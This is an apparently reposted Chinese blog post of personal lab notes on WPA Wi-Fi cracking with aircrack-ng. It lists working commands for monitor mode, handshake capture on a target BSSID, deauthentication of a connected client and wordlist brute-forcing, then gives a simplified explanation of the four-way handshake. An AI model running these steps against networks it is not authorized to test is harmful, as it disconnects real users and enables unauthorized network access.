码迷,mamicode.com
首页 > 其他好文 > 详细

aircrack-ng实验简记(不详记录了,个人记录)

时间:2018-12-11 21:44:37      阅读:276      评论:0      收藏:0      [点我收藏+]

标签:暴力破解   top   扫描   打开   desktop   重启   dump   频道   网络管理   

查看无线网卡 airmon-ng

开启网卡监听模式 airmon-ng start wlan0

扫描附近的wifi airodump-ng wlan0mon

停止扫描: ctrl c

 

使用airodump-ng监听指定目标频道

airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon

 

打开一个新的terminal

使用aireplay-ng进行解除认证攻击模式

aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon

 

关闭监听模式 airmon-ng stop wlan0mon

重启网络管理服务 service network-manager restart

使用字典进行暴力破解  aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap

 

一个合法的客户端要连上AP要经历四次握手 

1.你请求连AP                                                       

2.AP发一个数据包给你                        >>>>>>>>>>>>>>>>

3.你将收到的数据包用wpa密钥加密,然后发给AP      >>>>>>>>>>>>>>>

4.AP用自己保存的wpa密钥加密相同数据包,然后和你发给他的比较,如果相同,就发准许接入的许可。

 

根据2,3步的握手明文和密文推测出密钥.

aircrack-ng实验简记(不详记录了,个人记录)

标签:暴力破解   top   扫描   打开   desktop   重启   dump   频道   网络管理   

原文地址:https://www.cnblogs.com/williamkingv/p/10105047.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!